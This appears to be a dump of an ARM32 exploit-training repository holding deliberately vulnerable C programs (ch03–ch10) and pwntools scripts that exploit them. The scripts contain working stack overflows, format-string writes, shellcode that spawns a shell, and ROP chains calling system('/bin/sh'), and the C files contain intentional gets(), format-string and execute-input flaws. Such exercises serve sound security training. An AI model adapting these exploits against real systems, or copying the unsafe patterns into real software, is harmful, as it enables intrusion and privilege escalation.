    challenge_name = 'ch03'
    log.info('Exploiting {challenge_name}!'.format(challenge_name=challenge_name))
    # .r is the connection object used for all I/O below
    # (presumably a pwntools tube; confirm in ArmExploit.py).
    r = ArmExploit(challenge_name=challenge_name, execution=execution).r

    # Addresses come straight from the local ELF's symbol table; that relies
    # on the -no-pie build above. The filler length and the +2 are presumably
    # tied to this exact build and would change with other compiler flags.
    functions = ELF(challenge_name).functions
    secret01_func_addr = functions['secret01'].address
    secret02_func_addr = functions['secret02'].address + 2  # skip push {r7, lr}

    r.recvuntil('exit - close program')
    send(r, msg_name='angel',
         msg_content=cyclic(108) + pack(secret02_func_addr, word_size=32) + 'a' * 4 + pack(secret01_func_addr,
                                                                                            word_size=32))
    # The flag file in this repository is the placeholder zenysec{flag};
    # the prefix is consumed by recvuntil() and re-attached by hand.
    r.recvuntil('zenysec')
    flag = 'zenysec' + r.recvuntil('\n')
    log.success('The flag is: {flag}'.format(flag=flag))
    r.close()


if __name__ == '__main__':
    # -e/--execution is required and is passed to main() as `execution`.
    parser = argparse.ArgumentParser(description='Exploit ch03')
    parser.add_argument('-e', '--execution', help='execution type', required=True, dest='execution')
    main(**vars(parser.parse_args()))
--------------------------------------------------------------------------------
/writeups/arm32v7/ch03/flag:
--------------------------------------------------------------------------------
zenysec{flag}
--------------------------------------------------------------------------------
/writeups/arm32v7/ch04/ch04:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/eLoopWoo/zenysec-exploit-exercises/4fdf1da2b60a1d11e727eb217b23df477fe108ea/writeups/arm32v7/ch04/ch04
--------------------------------------------------------------------------------
/writeups/arm32v7/ch04/ch04.c:
--------------------------------------------------------------------------------
//__author__ = '@tomereyz'
/* NOTE(review): the header names after each #include were lost when this page
 * was extracted. The code below calls stdio, string, stdlib and unistd
 * functions. */
#include
#include
#include

/* Base buffer size; the two globals below are twice this. */
#define BUF_SIZE 50

/* Message body, filled by gets() in send(). */
char content[BUF_SIZE*2] = "dummy";
/* Permission string compared with "root" in send(); no statement in this
 * file writes to it. It is declared directly after content, so presumably
 * it also sits right behind content in memory (confirm with the symbol
 * table of the built binary). */
char perm[BUF_SIZE*2] = "user";

/* Run `cat flag` through system(). Called from send() when perm is "root". */
void secret(){
    system("cat flag");
}

/*
 * Read a name and a content line, echo them, and call secret() when perm
 * equals "root".
 *
 * Two reads exceed or ignore the size of their destination:
 *  - fgets(name, BUF_SIZE*2, ...) accepts up to 99 bytes plus the terminator
 *    into the 50-byte stack array name;
 *  - gets(content) has no limit at all on the 100-byte global content.
 * Both are deliberate for the exercise. The bounded forms are
 * fgets(name, sizeof name, stdin) and fgets(content, sizeof content, stdin),
 * and an authorisation decision should not rest on a writable string that is
 * stored next to an input buffer.
 */
void send(){
    char name[BUF_SIZE] = {0};
    printf("Creating message\n");
    printf("Enter message name:");
    fgets(name, BUF_SIZE*2, stdin);
    printf("Enter message content:");
    gets(content);

    printf("name: \"%s\"\ncontent:\"%s\"\n", name, content);
    if(strcmp(perm, "root") == 0){
        secret();
    }
}

/*
 * Print the menu, read one command line and dispatch it.
 *
 * Returns 0 for "exit" and 1 for everything else, including unknown input.
 * NOTE(review): the result of fgets() is not checked. At end of input the
 * zero-initialised buffer matches no command, so menu() returns 1 and the
 * loop in main() keeps running.
 */
int menu(){
    char buffer[BUF_SIZE] = {0};

    printf("[*] menu\n");
    printf("menu - show this menu\n");
    printf("send - send new message\n");
    printf("exit - close program\n");

    fgets(buffer, BUF_SIZE, stdin);

    /* fgets() keeps the newline, hence the "\n" in every comparison. */
    if (strcmp(buffer, "menu\n") == 0){
        return 1;
    }
    else if (strcmp(buffer, "send\n") == 0){
        send();
        return 1;
    }
    else if (strcmp(buffer, "exit\n") == 0){
        return 0;
    }
    else{
        printf("Unknown command: %s", buffer);
        return 1;
    }

}

/*
 * Entry point: disable stdout buffering, pin the process UIDs, then run the
 * menu until it returns 0.
 */
int main(int argc, char **argv){
    setbuf(stdout, NULL);
    /* Set real, effective and saved UID to the current effective UID.
     * NOTE(review): the return value of setresuid() is not checked. */
    uid_t uid = geteuid();
    setresuid(uid,uid,uid);
    printf("Welcome to ch04!\n");
    while(1){
        if (!(menu())){
            break;
        }
        printf("\n");
    }
    printf("Exiting...\n");
}
--------------------------------------------------------------------------------
/writeups/arm32v7/ch04/compile.sh:
--------------------------------------------------------------------------------
# -no-pie fixes the load address; no stack-protector flag is given, so the
# compiler default applies. $1 is unquoted, so a directory argument
# containing spaces would be split into several words.
gcc $1/ch04.c -static -no-pie -o $1/ch04
--------------------------------------------------------------------------------
/writeups/arm32v7/ch04/exploit.py:
--------------------------------------------------------------------------------
__author__ = '@tomereyz'

from pwn import *
from ArmExploit import ArmExploit
import argparse


def send(r, msg_name, msg_content):
    """Drive the target's 'send' menu command over the connection r.

    Sends the literal command 'send', waits for the name prompt and answers
    it with msg_name, then waits for the content prompt and answers it with
    msg_content. Nothing is returned.
    """
    r.sendline('send')
    r.recvuntil('Enter message name:')
    r.sendline(msg_name)
    r.recvuntil('Enter message content:')
    r.sendline(msg_content)


def main(execution):
    """Run the ch04 write-up against the bundled training binary.

    execution is forwarded unchanged to ArmExploit, which is imported from
    ArmExploit.py; the values it accepts are defined there, not here.
    One message is sent whose content is 100 bytes of cyclic() filler
    followed by the string 'root'. In ch04.c the content field is a 100-byte
    global read with an unbounded gets(), and send() calls secret() when the
    global perm equals "root"; no code address is used by this script.
    """
    challenge_name = 'ch04'
    log.info('Exploiting {challenge_name}!'.format(challenge_name=challenge_name))
    # .r is the connection object used for all I/O below
    # (presumably a pwntools tube; confirm in ArmExploit.py).
    r = ArmExploit(challenge_name=challenge_name, execution=execution).r

    r.recvuntil('exit - close program')
    send(r, msg_name='angel', msg_content=cyclic(100) + 'root')
    # The flag file in this repository is the placeholder zenysec{flag};
    # the prefix is consumed by recvuntil() and re-attached by hand.
    r.recvuntil('zenysec')
    flag = 'zenysec' + r.recvuntil('\n')
    log.success('The flag is: {flag}'.format(flag=flag))
    r.close()


if __name__ == '__main__':
    # -e/--execution is required and is passed to main() as `execution`.
    parser = argparse.ArgumentParser(description='Exploit ch04')
    parser.add_argument('-e', '--execution', help='execution type', required=True, dest='execution')
    main(**vars(parser.parse_args()))
--------------------------------------------------------------------------------
/writeups/arm32v7/ch04/flag:
--------------------------------------------------------------------------------
zenysec{flag}
--------------------------------------------------------------------------------
/writeups/arm32v7/ch05/ch05:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/eLoopWoo/zenysec-exploit-exercises/4fdf1da2b60a1d11e727eb217b23df477fe108ea/writeups/arm32v7/ch05/ch05
--------------------------------------------------------------------------------
/writeups/arm32v7/ch05/ch05.c:
--------------------------------------------------------------------------------
//__author__ = '@tomereyz'
/* NOTE(review): the header names after each #include were lost when this page
 * was extracted. The code below calls stdio, string, stdlib and unistd
 * functions. */
#include
#include
#include

/* Base buffer size; the message buffers in send() are twice this. */
#define BUF_SIZE 50

/* Run `cat flag` through system(). No call to it appears in this file. */
void secret(){
    system("cat flag");
}

/*
 * Read a name and a content line and echo them. Both reads are bounded by
 * the size of their destination array.
 *
 * content is then passed to printf() as the format string, so conversion
 * specifiers typed by the user are interpreted by printf(). That is the
 * deliberate flaw of this exercise. The safe form is printf("%s", content)
 * or fputs(content, stdout); gcc reports the pattern with
 * -Wformat -Wformat-security.
 */
void send(){
    char name[BUF_SIZE*2] = {0};
    char content[BUF_SIZE*2] = {0};

    printf("Creating message\n");
    printf("Enter message name:");
    fgets(name, BUF_SIZE*2, stdin);
    printf("Enter message content:");
    fgets(content, BUF_SIZE*2, stdin);

    printf("name: \"%s\"\ncontent:\"", name);
    /* User input used as the format string (see the function comment). */
    printf(content);
    printf("\"\n");
}

/*
 * Print the menu, read one command line and dispatch it.
 *
 * Returns 0 for "exit" and 1 for everything else, including unknown input.
 * NOTE(review): the result of fgets() is not checked. At end of input the
 * zero-initialised buffer matches no command, so menu() returns 1 and the
 * loop in main() keeps running.
 */
int menu(){
    char buffer[BUF_SIZE] = {0};

    printf("[*] menu\n");
    printf("menu - show this menu\n");
    printf("send - send new message\n");
    printf("exit - close program\n");

    fgets(buffer, BUF_SIZE, stdin);

    /* fgets() keeps the newline, hence the "\n" in every comparison. */
    if (strcmp(buffer, "menu\n") == 0){
        return 1;
    }
    else if (strcmp(buffer, "send\n") == 0){
        send();
        return 1;
    }
    else if (strcmp(buffer, "exit\n") == 0){
        return 0;
    }
    else{
        printf("Unknown command: %s", buffer);
        return 1;
    }

}

/*
 * Entry point: disable stdout buffering, pin the process UIDs, then run the
 * menu until it returns 0. Leaves through exit() with status 1 instead of
 * returning from main().
 */
int main(int argc, char **argv){
    setbuf(stdout, NULL);
    /* Set real, effective and saved UID to the current effective UID.
     * NOTE(review): the return value of setresuid() is not checked. */
    uid_t uid = geteuid();
    setresuid(uid,uid,uid);
    printf("Welcome to ch05!\n");
    while(1){
        if (!(menu())){
            break;
        }
        printf("\n");
    }
    printf("Exiting...\n");
    exit(1);
}
--------------------------------------------------------------------------------
/writeups/arm32v7/ch05/compile.sh:
--------------------------------------------------------------------------------
gcc $1/ch05.c -static -no-pie -o $1/ch05
--------------------------------------------------------------------------------
/writeups/arm32v7/ch05/exploit.py:
-------------------------------------------------------------------------------- 1 | __author__ = '@tomereyz' 2 | 3 | from pwn import * 4 | from ArmExploit import ArmExploit 5 | import argparse 6 | 7 | 8 | def send(r, msg_name, msg_content): 9 | r.sendline('send') 10 | r.recvuntil('Enter message name:') 11 | r.sendline(msg_name) 12 | r.recvuntil('Enter message content:') 13 | r.sendline(msg_content) 14 | 15 | 16 | def main(execution): 17 | challenge_name = 'ch05' 18 | log.info('Exploiting {challenge_name}!'.format(challenge_name=challenge_name)) 19 | r = ArmExploit(challenge_name=challenge_name, execution=execution).r 20 | 21 | secret_func_addr = ELF(challenge_name).functions['secret'].address 22 | 23 | leak_offset = 56 24 | r.recvuntil('exit - close program') 25 | send(r, msg_name='angel', 26 | msg_content='%{leak_offset}$x'.format(leak_offset=leak_offset)) 27 | r.recvuntil('content:\"') 28 | stack_return = int(r.recvuntil('\n').strip(), 16) - 4 29 | log.info("stack return: {stack_return}".format(stack_return=hex(stack_return))) 30 | r.recvuntil('exit - close program') 31 | 32 | r1 = (secret_func_addr & 0xffff) - 0x8 33 | r2 = ((secret_func_addr >> 16) - r1 - 1) & 0xffff - 8 34 | content_offset01 = 30 35 | content_offset02 = 31 36 | 37 | # Option A 38 | send(r, msg_name='angel', 39 | msg_content='{ret01}{ret02}%{padding01}x%{content_offset01}$hnn%{padding02}x%{content_offset02}$hnn'.format( 40 | ret01=pack(stack_return, word_size=32), 41 | ret02=pack(stack_return + 2, word_size=32), 42 | content_offset01=content_offset01, 43 | content_offset02=content_offset02, 44 | padding01=r1, 45 | padding02=r2)) 46 | 47 | # Option B 48 | # send(r, msg_name='angel', 49 | # msg_content='{ret01}{ret02}%{padding01}x%{content_offset01}$hnn'.format( 50 | # ret01=pack(stack_return, word_size=32), 51 | # ret02=pack(stack_return + 2, word_size=32), 52 | # content_offset01=content_offset01, 53 | # padding01=r1)) 54 | 55 | r.recvuntil('zenysec') 56 | flag = 'zenysec' + r.recvuntil('\n') 
57 | log.success('The flag is: {flag}'.format(flag=flag)) 58 | r.close() 59 | 60 | 61 | if __name__ == '__main__': 62 | parser = argparse.ArgumentParser(description='Exploit ch05') 63 | parser.add_argument('-e', '--execution', help='execution type', required=True, dest='execution') 64 | main(**vars(parser.parse_args())) 65 | -------------------------------------------------------------------------------- /writeups/arm32v7/ch05/flag: -------------------------------------------------------------------------------- 1 | zenysec{flag} 2 | -------------------------------------------------------------------------------- /writeups/arm32v7/ch06/ch06: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/eLoopWoo/zenysec-exploit-exercises/4fdf1da2b60a1d11e727eb217b23df477fe108ea/writeups/arm32v7/ch06/ch06 -------------------------------------------------------------------------------- /writeups/arm32v7/ch06/ch06.c: -------------------------------------------------------------------------------- 1 | //__author__ = '@tomereyz' 2 | #include 3 | #include 4 | #include 5 | 6 | #include 7 | 8 | #define BUF_SIZE 50 9 | #define PAGE_SIZE 4096 10 | 11 | void runner(){ 12 | char content[PAGE_SIZE]; 13 | char *code; 14 | 15 | printf("Enter byte to run:"); 16 | fgets(content, PAGE_SIZE, stdin); 17 | 18 | code = mmap(NULL, PAGE_SIZE, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0); 19 | memcpy(code, content, PAGE_SIZE); 20 | 21 | mprotect(code, PAGE_SIZE, PROT_READ|PROT_EXEC); 22 | 23 | void (*func)() = (void (*)())code; 24 | func(); 25 | 26 | munmap(code, PAGE_SIZE); 27 | } 28 | 29 | void send(){ 30 | char name[BUF_SIZE] = {0}; 31 | char content[BUF_SIZE] = {0}; 32 | 33 | printf("Creating message\n"); 34 | printf("Enter message name:"); 35 | fgets(name, BUF_SIZE, stdin); 36 | printf("Enter message content:"); 37 | fgets(content, BUF_SIZE, stdin); 38 | 39 | printf("name: \"%s\"\ncontent:\"%s\"\n", name, content); 40 | } 
41 | 42 | int menu(){ 43 | char buffer[BUF_SIZE] = {0}; 44 | 45 | printf("[*] menu\n"); 46 | printf("menu - show this menu\n"); 47 | printf("send - send new message\n"); 48 | printf("runner - run bytes\n"); 49 | printf("exit - close program\n"); 50 | 51 | fgets(buffer, BUF_SIZE, stdin); 52 | 53 | if (strcmp(buffer, "menu\n") == 0){ 54 | return 1; 55 | } 56 | else if (strcmp(buffer, "send\n") == 0){ 57 | send(); 58 | return 1; 59 | } 60 | else if (strcmp(buffer, "runner\n") == 0){ 61 | runner(); 62 | return 1; 63 | } 64 | else if (strcmp(buffer, "exit\n") == 0){ 65 | return 0; 66 | } 67 | else{ 68 | printf("Unknown command: %s", buffer); 69 | return 1; 70 | } 71 | 72 | } 73 | 74 | int main(int argc, char **argv){ 75 | setbuf(stdout, NULL); 76 | uid_t uid = geteuid(); 77 | setresuid(uid,uid,uid); 78 | printf("Welcome to ch06!\n"); 79 | while(1){ 80 | if (!(menu())){ 81 | break; 82 | } 83 | printf("\n"); 84 | } 85 | printf("Exiting...\n"); 86 | } 87 | -------------------------------------------------------------------------------- /writeups/arm32v7/ch06/compile.sh: -------------------------------------------------------------------------------- 1 | gcc $1/ch06.c -static -no-pie -o $1/ch06 2 | -------------------------------------------------------------------------------- /writeups/arm32v7/ch06/exploit.py: -------------------------------------------------------------------------------- 1 | __author__ = '@tomereyz' 2 | 3 | from pwn import * 4 | from ArmExploit import ArmExploit 5 | import argparse 6 | 7 | context.clear(arch='arm') 8 | 9 | 10 | def runner(r, payload): 11 | r.sendline('runner') 12 | r.recvuntil('Enter byte to run:') 13 | r.sendline(payload) 14 | 15 | 16 | def send(r, msg_name, msg_content): 17 | r.sendline('send') 18 | r.recvuntil('Enter message name:') 19 | r.sendline(msg_name) 20 | r.recvuntil('Enter message content:') 21 | r.sendline(msg_content) 22 | 23 | 24 | def main(execution): 25 | challenge_name = 'ch06' 26 | log.info('Exploiting 
{challenge_name}!'.format(challenge_name=challenge_name)) 27 | r = ArmExploit(challenge_name=challenge_name, execution=execution).r 28 | 29 | # Option 1 30 | shell_code = asm(shellcraft.arm.linux.sh()) 31 | 32 | r.recvuntil('exit - close program') 33 | runner(r, payload=shell_code) 34 | 35 | r.sendline('cat flag') 36 | r.recvuntil('zenysec') 37 | flag = 'zenysec' + r.recvuntil('\n') 38 | log.success('The flag is: {flag}'.format(flag=flag)) 39 | r.close() 40 | 41 | 42 | if __name__ == '__main__': 43 | parser = argparse.ArgumentParser(description='Exploit ch06') 44 | parser.add_argument('-e', '--execution', help='execution type', required=True, dest='execution') 45 | main(**vars(parser.parse_args())) 46 | -------------------------------------------------------------------------------- /writeups/arm32v7/ch06/flag: -------------------------------------------------------------------------------- 1 | zenysec{flag} 2 | -------------------------------------------------------------------------------- /writeups/arm32v7/ch07/ch07: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/eLoopWoo/zenysec-exploit-exercises/4fdf1da2b60a1d11e727eb217b23df477fe108ea/writeups/arm32v7/ch07/ch07 -------------------------------------------------------------------------------- /writeups/arm32v7/ch07/ch07.c: -------------------------------------------------------------------------------- 1 | //__author__ = '@tomereyz' 2 | #include 3 | #include 4 | #include 5 | 6 | #define BUF_SIZE 50 7 | 8 | char command_string[BUF_SIZE] = "cat flag\x00"; 9 | 10 | void func(){ 11 | system("whoami"); 12 | } 13 | 14 | void gadget(){ 15 | __asm__("pop {r0,pc}\n"); 16 | } 17 | 18 | void send(){ 19 | char name[BUF_SIZE] = {0}; 20 | char content[BUF_SIZE] = {0}; 21 | 22 | printf("Creating message\n"); 23 | printf("Enter message name:"); 24 | fgets(name, BUF_SIZE, stdin); 25 | printf("Enter message content:"); 26 | gets(content); 27 | 28 | printf("name: 
\"%s\"\ncontent:\"%s\"\n", name, content); 29 | } 30 | 31 | int menu(){ 32 | char buffer[BUF_SIZE] = {0}; 33 | 34 | printf("[*] menu\n"); 35 | printf("menu - show this menu\n"); 36 | printf("send - send new message\n"); 37 | printf("exit - close program\n"); 38 | 39 | fgets(buffer, BUF_SIZE, stdin); 40 | 41 | if (strcmp(buffer, "menu\n") == 0){ 42 | return 1; 43 | } 44 | else if (strcmp(buffer, "send\n") == 0){ 45 | send(); 46 | return 1; 47 | } 48 | else if (strcmp(buffer, "exit\n") == 0){ 49 | return 0; 50 | } 51 | else{ 52 | printf("Unknown command: %s", buffer); 53 | return 1; 54 | } 55 | 56 | } 57 | 58 | int main(int argc, char **argv){ 59 | setbuf(stdout, NULL); 60 | uid_t uid = geteuid(); 61 | setresuid(uid,uid,uid); 62 | printf("Welcome to ch07!\n"); 63 | while(1){ 64 | if (!(menu())){ 65 | break; 66 | } 67 | printf("\n"); 68 | } 69 | printf("Exiting...\n"); 70 | } 71 | -------------------------------------------------------------------------------- /writeups/arm32v7/ch07/compile.sh: -------------------------------------------------------------------------------- 1 | gcc $1/ch07.c -static -fno-stack-protector -no-pie -o $1/ch07 2 | -------------------------------------------------------------------------------- /writeups/arm32v7/ch07/exploit.py: -------------------------------------------------------------------------------- 1 | __author__ = '@tomereyz' 2 | 3 | from pwn import * 4 | from ArmExploit import ArmExploit 5 | import argparse 6 | 7 | 8 | def send(r, msg_name, msg_content): 9 | r.sendline('send') 10 | r.recvuntil('Enter message name:') 11 | r.sendline(msg_name) 12 | r.recvuntil('Enter message content:') 13 | r.sendline(msg_content) 14 | 15 | 16 | def main(execution): 17 | challenge_name = 'ch07' 18 | log.info('Exploiting {challenge_name}!'.format(challenge_name=challenge_name)) 19 | r = ArmExploit(challenge_name=challenge_name, execution=execution).r 20 | 21 | e = ELF(challenge_name) 22 | functions = e.functions 23 | symbols = e.symbols 24 | 
gadget_func_addr = functions['gadget'].address + 4 # pop {r0, pc} 25 | 26 | func_func_addr = functions['func'].address + 12 # bl 0x14cbc 27 | 28 | command_string_addr = symbols['command_string'] # "cat flag" 29 | 30 | r.recvuntil('exit - close program') 31 | send(r, msg_name='angel', 32 | msg_content=cyclic(108) + pack(gadget_func_addr, 32) + pack(command_string_addr, 32) + pack(func_func_addr, 33 | 32)) 34 | r.recvuntil('zenysec') 35 | flag = 'zenysec' + r.recvuntil('\n') 36 | log.success('The flag is: {flag}'.format(flag=flag)) 37 | r.close() 38 | 39 | 40 | if __name__ == '__main__': 41 | parser = argparse.ArgumentParser(description='Exploit ch07') 42 | parser.add_argument('-e', '--execution', help='execution type', required=True, dest='execution') 43 | main(**vars(parser.parse_args())) 44 | -------------------------------------------------------------------------------- /writeups/arm32v7/ch07/flag: -------------------------------------------------------------------------------- 1 | zenysec{flag} 2 | -------------------------------------------------------------------------------- /writeups/arm32v7/ch08/ch08: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/eLoopWoo/zenysec-exploit-exercises/4fdf1da2b60a1d11e727eb217b23df477fe108ea/writeups/arm32v7/ch08/ch08 -------------------------------------------------------------------------------- /writeups/arm32v7/ch08/ch08.c: -------------------------------------------------------------------------------- 1 | //__author__ = '@tomereyz' 2 | #include 3 | #include 4 | #include 5 | 6 | #define BUF_SIZE 50 7 | 8 | void func(){ 9 | system("whoami"); 10 | } 11 | 12 | void send(){ 13 | char name[BUF_SIZE] = {0}; 14 | char content[BUF_SIZE] = {0}; 15 | 16 | printf("Creating message\n"); 17 | printf("Enter message name:"); 18 | fgets(name, BUF_SIZE, stdin); 19 | printf("Enter message content:"); 20 | gets(content); 21 | 22 | printf("name: \"%s\"\ncontent:\"%s\"\n", 
name, content); 23 | } 24 | 25 | int menu(){ 26 | char buffer[BUF_SIZE] = {0}; 27 | 28 | printf("[*] menu\n"); 29 | printf("menu - show this menu\n"); 30 | printf("send - send new message\n"); 31 | printf("exit - close program\n"); 32 | 33 | fgets(buffer, BUF_SIZE, stdin); 34 | 35 | if (strcmp(buffer, "menu\n") == 0){ 36 | return 1; 37 | } 38 | else if (strcmp(buffer, "send\n") == 0){ 39 | send(); 40 | return 1; 41 | } 42 | else if (strcmp(buffer, "exit\n") == 0){ 43 | return 0; 44 | } 45 | else{ 46 | printf("Unknown command: %s", buffer); 47 | return 1; 48 | } 49 | 50 | } 51 | 52 | int main(int argc, char **argv){ 53 | setbuf(stdout, NULL); 54 | uid_t uid = geteuid(); 55 | setresuid(uid,uid,uid); 56 | printf("Welcome to ch08!\n"); 57 | while(1){ 58 | if (!(menu())){ 59 | break; 60 | } 61 | printf("\n"); 62 | } 63 | printf("Exiting...\n"); 64 | } 65 | -------------------------------------------------------------------------------- /writeups/arm32v7/ch08/compile.sh: -------------------------------------------------------------------------------- 1 | gcc $1/ch08.c -static -fno-stack-protector -no-pie -o $1/ch08 2 | -------------------------------------------------------------------------------- /writeups/arm32v7/ch08/exploit.py: -------------------------------------------------------------------------------- 1 | __author__ = '@tomereyz' 2 | 3 | from pwn import * 4 | from ArmExploit import ArmExploit 5 | import argparse 6 | 7 | context.clear(arch='arm') 8 | 9 | 10 | def send(r, msg_name, msg_content): 11 | r.sendline('send') 12 | r.recvuntil('Enter message name:') 13 | r.sendline(msg_name) 14 | r.recvuntil('Enter message content:') 15 | r.sendline(msg_content) 16 | 17 | 18 | def main(execution): 19 | challenge_name = 'ch08' 20 | log.info('Exploiting {challenge_name}!'.format(challenge_name=challenge_name)) 21 | r = ArmExploit(challenge_name=challenge_name, execution=execution).r 22 | 23 | e = ELF(challenge_name) 24 | functions = e.functions 25 | 26 | gadget_func_addr 
= next(e.search(asm('pop {r0, r4, pc}'))) # 0x0001f9ec 27 | 28 | func_system_addr = functions['system'].address 29 | 30 | command_string_addr = next(e.search('/bin/sh')) 31 | 32 | r.recvuntil('exit - close program') 33 | send(r, msg_name='angel', 34 | msg_content=cyclic(108) + pack(gadget_func_addr, 32) + pack(command_string_addr, 32) + 'aaaa' + pack( 35 | func_system_addr, 36 | 32)) 37 | 38 | r.sendline('cat flag') 39 | r.recvuntil('zenysec') 40 | flag = 'zenysec' + r.recvuntil('\n') 41 | log.success('The flag is: {flag}'.format(flag=flag)) 42 | r.close() 43 | 44 | 45 | if __name__ == '__main__': 46 | parser = argparse.ArgumentParser(description='Exploit ch08') 47 | parser.add_argument('-e', '--execution', help='execution type', required=True, dest='execution') 48 | main(**vars(parser.parse_args())) 49 | -------------------------------------------------------------------------------- /writeups/arm32v7/ch08/flag: -------------------------------------------------------------------------------- 1 | zenysec{flag} 2 | -------------------------------------------------------------------------------- /writeups/arm32v7/ch09/ch09: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/eLoopWoo/zenysec-exploit-exercises/4fdf1da2b60a1d11e727eb217b23df477fe108ea/writeups/arm32v7/ch09/ch09 -------------------------------------------------------------------------------- /writeups/arm32v7/ch09/ch09.c: -------------------------------------------------------------------------------- 1 | //__author__ = '@tomereyz' 2 | #include 3 | #include 4 | #include 5 | 6 | #define BUF_SIZE 50 7 | 8 | int admin = 0; 9 | char command_string[BUF_SIZE] = "whoami\x00"; 10 | 11 | void write_anywhere(){ 12 | __asm__("str r0, [r1]"); 13 | printf("write_anywhere!\n"); 14 | } 15 | 16 | void gadget(){ 17 | __asm__("pop {r0,r1,pc}"); 18 | } 19 | 20 | void authenticate(){ 21 | uid_t uid = geteuid(); 22 | strcpy(command_string, "cat flag\x00"); 23 | 
if (admin == 1){ 24 | setresuid(uid,uid,uid); 25 | system(command_string); 26 | } 27 | printf("You are not admin!\n"); 28 | } 29 | 30 | void send(){ 31 | char name[BUF_SIZE] = {0}; 32 | char content[BUF_SIZE] = {0}; 33 | 34 | printf("Creating message\n"); 35 | printf("Enter message name:"); 36 | fgets(name, BUF_SIZE, stdin); 37 | printf("Enter message content:"); 38 | gets(content); 39 | 40 | printf("name: \"%s\"\ncontent:\"%s\"\n", name, content); 41 | } 42 | 43 | int menu(){ 44 | char buffer[BUF_SIZE] = {0}; 45 | 46 | printf("[*] menu\n"); 47 | printf("menu - show this menu\n"); 48 | printf("send - send new message\n"); 49 | printf("exit - close program\n"); 50 | 51 | fgets(buffer, BUF_SIZE, stdin); 52 | 53 | if (strcmp(buffer, "menu\n") == 0){ 54 | return 1; 55 | } 56 | else if (strcmp(buffer, "send\n") == 0){ 57 | send(); 58 | return 1; 59 | } 60 | else if (strcmp(buffer, "admin\n") == 0){ 61 | authenticate(); 62 | return 1; 63 | } 64 | else if (strcmp(buffer, "exit\n") == 0){ 65 | return 0; 66 | } 67 | else{ 68 | printf("Unknown command: %s", buffer); 69 | return 1; 70 | } 71 | 72 | } 73 | 74 | int main(int argc, char **argv){ 75 | setbuf(stdout, NULL); 76 | printf("Welcome to ch09!\n"); 77 | while(1){ 78 | if (!(menu())){ 79 | break; 80 | } 81 | printf("\n"); 82 | } 83 | printf("Exiting...\n"); 84 | } 85 | -------------------------------------------------------------------------------- /writeups/arm32v7/ch09/compile.sh: -------------------------------------------------------------------------------- 1 | gcc $1/ch09.c -static -fno-stack-protector -no-pie -o $1/ch09 2 | -------------------------------------------------------------------------------- /writeups/arm32v7/ch09/exploit.py: -------------------------------------------------------------------------------- 1 | __author__ = '@tomereyz' 2 | 3 | from pwn import * 4 | from ArmExploit import ArmExploit 5 | import argparse 6 | 7 | 8 | def send(r, msg_name, msg_content): 9 | r.sendline('send') 10 | 
r.recvuntil('Enter message name:') 11 | r.sendline(msg_name) 12 | r.recvuntil('Enter message content:') 13 | r.sendline(msg_content) 14 | 15 | 16 | def main(execution): 17 | challenge_name = 'ch09' 18 | log.info('Exploiting {challenge_name}!'.format(challenge_name=challenge_name)) 19 | r = ArmExploit(challenge_name=challenge_name, execution=execution).r 20 | 21 | e = ELF(challenge_name) 22 | functions = e.functions 23 | symbols = e.symbols 24 | write_anywhere_func_addr = functions['write_anywhere'].address + 4 25 | authenticate_func_addr = functions['authenticate'].address 26 | gadget_func_addr = functions['gadget'].address + 4 27 | admin_string_addr = symbols['admin'] 28 | 29 | r.recvuntil('exit - close program') 30 | send(r, msg_name='angel', 31 | msg_content=cyclic(108) + pack(gadget_func_addr, 32) + pack(0x1, word_size=32) + pack(admin_string_addr, 32 | word_size=32) + pack( 33 | write_anywhere_func_addr, word_size=32) + 'aaaa' + pack(authenticate_func_addr, 32)) 34 | 35 | r.recvuntil('zenysec') 36 | flag = 'zenysec' + r.recvuntil('\n') 37 | log.success('The flag is: {flag}'.format(flag=flag)) 38 | r.close() 39 | 40 | 41 | if __name__ == '__main__': 42 | parser = argparse.ArgumentParser(description='Exploit ch09') 43 | parser.add_argument('-e', '--execution', help='execution type', required=True, dest='execution') 44 | main(**vars(parser.parse_args())) 45 | -------------------------------------------------------------------------------- /writeups/arm32v7/ch09/flag: -------------------------------------------------------------------------------- 1 | zenysec{flag} 2 | -------------------------------------------------------------------------------- /writeups/arm32v7/ch10/ch10: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/eLoopWoo/zenysec-exploit-exercises/4fdf1da2b60a1d11e727eb217b23df477fe108ea/writeups/arm32v7/ch10/ch10 
-------------------------------------------------------------------------------- /writeups/arm32v7/ch10/ch10.c: -------------------------------------------------------------------------------- 1 | //__author__ = '@tomereyz' 2 | #include 3 | #include 4 | #include 5 | 6 | #define BUF_SIZE 50 7 | 8 | void send(){ 9 | char name[BUF_SIZE] = {0}; 10 | char content[BUF_SIZE] = {0}; 11 | 12 | printf("Creating message\n"); 13 | printf("Enter message name:"); 14 | fgets(name, BUF_SIZE, stdin); 15 | printf("Enter message content:"); 16 | gets(content); 17 | 18 | printf("name: \""); 19 | printf(name); 20 | printf("\"\ncontent:\"%s\"\n", content); 21 | } 22 | 23 | int menu(){ 24 | char buffer[BUF_SIZE] = {0}; 25 | 26 | printf("[*] menu\n"); 27 | printf("menu - show this menu\n"); 28 | printf("send - send new message\n"); 29 | printf("exit - close program\n"); 30 | 31 | fgets(buffer, BUF_SIZE, stdin); 32 | 33 | if (strcmp(buffer, "menu\n") == 0){ 34 | return 1; 35 | } 36 | else if (strcmp(buffer, "send\n") == 0){ 37 | send(); 38 | return 1; 39 | } 40 | else if (strcmp(buffer, "exit\n") == 0){ 41 | return 0; 42 | } 43 | else{ 44 | printf("Unknown command: %s", buffer); 45 | return 1; 46 | } 47 | 48 | } 49 | 50 | int main(int argc, char **argv){ 51 | setbuf(stdout, NULL); 52 | uid_t uid = geteuid(); 53 | setresuid(uid,uid,uid); 54 | printf("Welcome to ch10!\n"); 55 | while(1){ 56 | if (!(menu())){ 57 | break; 58 | } 59 | printf("\n"); 60 | } 61 | printf("Exiting...\n"); 62 | } 63 | -------------------------------------------------------------------------------- /writeups/arm32v7/ch10/compile.sh: -------------------------------------------------------------------------------- 1 | gcc $1/ch10.c -static -fno-stack-protector -z execstack -no-pie -o $1/ch10 2 | -------------------------------------------------------------------------------- /writeups/arm32v7/ch10/exploit.py: 